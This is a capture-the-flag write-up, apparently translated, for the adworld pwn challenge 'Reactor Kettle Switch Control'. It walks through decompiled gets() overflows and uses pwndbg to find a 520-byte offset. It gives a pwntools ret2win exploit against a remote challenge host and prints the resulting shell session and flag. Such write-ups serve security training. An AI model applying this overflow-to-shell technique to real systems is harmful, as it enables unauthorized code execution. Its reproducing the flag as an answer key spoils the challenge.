攻防世界 (adworld): 反应釜开关控制 (Reactor Kettle Switch Control)
Reactor Kettle Switch Control: stack overflow
(1)
motaly@motaly-VMware-Virtual-Platform:~/桌面$ file pwn
pwn: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=6145840505e7d75d0020a02b556136ce4c936ed9, not stripped
motaly@motaly-VMware-Virtual-Platform:~/桌面$ checksec --file=pwn
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Partial RELRO No canary found NX enabled No PIE No RPATH No RUNPATH 73 Symbols No 0 2 pwn
(2)
Open the binary in IDA and press F5 (if nothing happens, check whether your keyboard has an Fn key and use Fn+F5).
int __fastcall main(int argc, const char **argv, const char **envp)
{
  char s[64]; // [rsp+0h] [rbp-240h] BYREF
  _BYTE v5[512]; // [rsp+40h] [rbp-200h] BYREF

  write(1, "Please closing the reaction kettle\n", 0x23uLL);
  write(1, "The switch is:", 0xEuLL);
  sprintf(s, "%p\n", easy);
  write(1, s, 9uLL);
  write(1, ">", 2uLL);
  gets(v5);
  return 0;
}
Here we see an easy function, and the program prints easy's address.
Then comes a gets call, so there is a buffer overflow.
__int64 easy()
{
  char s[64]; // [rsp+0h] [rbp-1C0h] BYREF
  _BYTE v2[384]; // [rsp+40h] [rbp-180h] BYREF

  write(1, "You have closed the first switch\n", 0x21uLL);
  write(1, "Please closing the second reaction kettle\n", 0x2AuLL);
  write(1, "The switch is:", 0xEuLL);
  sprintf(s, "%p\n", normal);
  write(1, s, 9uLL);
  write(1, ">", 2uLL);
  return gets(v2);
}
As before, there is a normal function and the program prints normal's address,
followed by gets, so another buffer overflow.
__int64 normal()
{
  char s[64]; // [rsp+0h] [rbp-140h] BYREF
  _BYTE v2[256]; // [rsp+40h] [rbp-100h] BYREF

  write(1, "You have closed the first switch\n", 0x22uLL);
  write(1, "Please closing the third reaction kettle\n", 0x2AuLL);
  write(1, "The switch is:", 0xEuLL);
  sprintf(s, "%p\n", shell);
  write(1, s, 9uLL);
  write(1, ">", 2uLL);
  return gets(v2);
}
As before, there is a shell function and the program prints shell's address,
followed by gets, so another buffer overflow.
int shell()
{
  return system("/bin/sh");
}
The shell function is the target to chain to.
(3)
Approach:
Overall, each stage of this program leaks the address of the next stage's function, and the final stage is the backdoor shell function. But we can simply read shell's address directly in IDA, use it as the return address, and reach it through the stack overflow.
First, debug dynamically with pwndbg.
motaly@motaly-VMware-Virtual-Platform:~/桌面$ gdb pwn
GNU gdb (Ubuntu 15.0.50.20240403-0ubuntu1) 15.0.50.20240403-git
Copyright (C) 2024 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 177 pwndbg commands and 46 shell commands. Type pwndbg [--shell | --all] [filter] for a list.
pwndbg: created $rebase, $base, $hex2ptr, $argv, $envp, $argc, $environ, $bn_sym, $bn_var, $bn_eval, $ida GDB functions (can be used with print/break)
Reading symbols from pwn...
This GDB supports auto-downloading debuginfo from the following URLs:
<https://debuginfod.ubuntu.com>
Debuginfod has been disabled.
To make this setting permanent, add 'set debuginfod enabled off' to .gdbinit.
(No debugging symbols found in pwn)
------- tip of the day (disable with set show-tips off) -------
If your program has multiple threads they will be displayed in the context display or using the context threads command
pwndbg> cyclic 1000
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaacoaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaae
pwndbg> r
Starting program: /home/motaly/桌面/pwn
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Please closing the reaction kettle
The switch is:0x4006b0
>aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaacoaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaae
Program received signal SIGSEGV, Segmentation fault.
0x00000000004007f1 in main ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]────────────────────────────
 RAX  0
 RBX  0x7fffffffd838 ◂— 'baaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaae'
 RCX  0x7ffff7e038e0 (_IO_2_1_stdin_) ◂— 0xfbad2288
 RDX  0
 RDI  0x7ffff7e05720 (_IO_stdfile_0_lock) ◂— 0
 RSI  0x6025d0 ◂— 'caaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaae\n'
 R8   0x602689 ◂— 0
 R9   0
 R10  1
 R11  0x246
 R12  1
 R13  0
 R14  0
 R15  0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 ◂— 0
 RBP  0x636161616161616f ('oaaaaaac')
 RSP  0x7fffffffd718 ◂— 0x6361616161616170 ('paaaaaac')
 RIP  0x4007f1 (main+152) ◂— ret
────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────
 ► 0x4007f1 <main+152>    ret    <0x6361616161616170>
   ↓
──────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────
00:0000│ rsp 0x7fffffffd718 ◂— 0x6361616161616170 ('paaaaaac')
01:0008│ 0x7fffffffd720 ◂— 0x6361616161616171 ('qaaaaaac')
02:0010│ 0x7fffffffd728 ◂— 0x6361616161616172 ('raaaaaac')
03:0018│ 0x7fffffffd730 ◂— 0x6361616161616173 ('saaaaaac')
04:0020│ 0x7fffffffd738 ◂— 0x6361616161616174 ('taaaaaac')
05:0028│ 0x7fffffffd740 ◂— 0x6361616161616175 ('uaaaaaac')
06:0030│ 0x7fffffffd748 ◂— 0x6361616161616176 ('vaaaaaac')
07:0038│ 0x7fffffffd750 ◂— 0x6361616161616177 ('waaaaaac')
────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────
 ► 0   0x4007f1 main+152
   1   0x6361616161616170 None
   2   0x6361616161616171 None
   3   0x6361616161616172 None
   4   0x6361616161616173 None
   5   0x6361616161616174 None
   6   0x6361616161616175 None
   7   0x6361616161616176 None
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> cyclic -l 0x6361616161616170
Finding cyclic pattern of 8 bytes: b'paaaaaac' (hex: 0x7061616161616163)
Found at offset 520
The offset is 520.
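As an added example (not part of the original writeup), here is a small Python reimplementation of the de Bruijn pattern behind pwndbg's `cyclic` / `cyclic -l`, plus a cross-check of the 520 offset against the decompiled frame layout: main()'s v5 sits at [rbp-200h], and the saved return address is 8 bytes above the saved rbp, so 0x200 + 8 = 520. The function names are my own; the 0x6361616161616170 value and the [rbp-200h] displacement are taken from the session above.

```python
import string


def de_bruijn(alphabet=string.ascii_lowercase, n=8):
    """Yield B(k, n) as a concatenation of Lyndon words, the construction
    pwntools' cyclic() uses (this is a hypothetical reimplementation)."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length, n=8):
    """First `length` characters of the pattern (cf. `cyclic 1000`)."""
    out = []
    for ch in de_bruijn(n=n):
        if len(out) == length:
            break
        out.append(ch)
    return "".join(out)


def cyclic_find(value, n=8, max_len=100000):
    """Offset of an n-byte chunk in the pattern (cf. `cyclic -l`). `value` may be
    the raw integer pwndbg shows in RSP/RIP: that is the chunk in little-endian."""
    chunk = value.to_bytes(n, "little").decode() if isinstance(value, int) else value
    return cyclic(max_len, n).find(chunk)


def offset_from_frame(disp_hex, saved_rbp=8):
    """Cross-check from the decompiler: a local at [rbp-disp] lies disp bytes below
    the saved rbp, and the return address sits `saved_rbp` bytes above that."""
    return int(disp_hex, 16) + saved_rbp


if __name__ == "__main__":
    # Values taken from the writeup: RSP held 0x6361616161616170 at the crash,
    # and IDA placed main()'s v5 at [rbp-200h]. Both routes give 520.
    print(cyclic_find(0x6361616161616170))   # 520
    print(offset_from_frame("200"))          # 520
```

The same cross-check applied to easy() (v2 at [rbp-180h]) gives 0x180 + 8 = 392, which is the distance a `gets(v2)` overflow in that frame would need to reach the return address.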
Next, look up the address of the shell function in IDA.
.text:00000000004005F6
.text:00000000004005F6 ; Attributes: bp-based frame
.text:00000000004005F6
.text:00000000004005F6 ; int shell()
.text:00000000004005F6 public shell
.text:00000000004005F6 shell proc near ; DATA XREF: normal+4E↓o
.text:00000000004005F6 ; __unwind {
.text:00000000004005F6 push rbp
.text:00000000004005F7 mov rbp, rsp
.text:00000000004005FA mov edi, offset command ; "/bin/sh"
.text:00000000004005FF call _system
.text:0000000000400604 nop
.text:0000000000400605 pop rbp
.text:0000000000400606 retn
.text:0000000000400606 ; } // starts at 4005F6
.text:0000000000400606 shell endp
.text:0000000000400606
.text:0000000000400607
The address of shell is 0x4005F6.
(4)
Write the exploit:
from pwn import *

context(os='linux', arch='amd64', log_level='debug')
p = remote('223.112.5.141', 54755)
# p = process('/home/motaly/桌面/pwn')  # run against the local binary instead

sh = 0x4005F6                   # address of shell(), read from IDA (No PIE, so it is fixed)
payload = b'a' * 520 + p64(sh)  # 520 bytes of padding up to the saved return address, then shell()
p.sendafter(">", payload)       # no trailing newline: gets() returns once the next line is typed
p.interactive()
(5)
Connect and get the flag:
[*] Switching to interactive mode
\x00$ ls
[DEBUG] Sent 0x3 bytes:
    b'ls\n'
$ ls
[DEBUG] Sent 0x3 bytes:
    b'ls\n'
[DEBUG] Received 0x23 bytes:
    b'bin\n'
    b'blind\n'
    b'dev\n'
    b'flag\n'
    b'lib\n'
    b'lib32\n'
    b'lib64\n'
bin
blind
dev
flag
lib
lib32
lib64
$ cat flag
[DEBUG] Sent 0x9 bytes:
    b'cat flag\n'
[DEBUG] Received 0x2d bytes:
    b'cyberpeace{38e3269fca57a49f53663fb98883f6d8}\n'
cyberpeace{38e3269fca57a49f53663fb98883f6d8}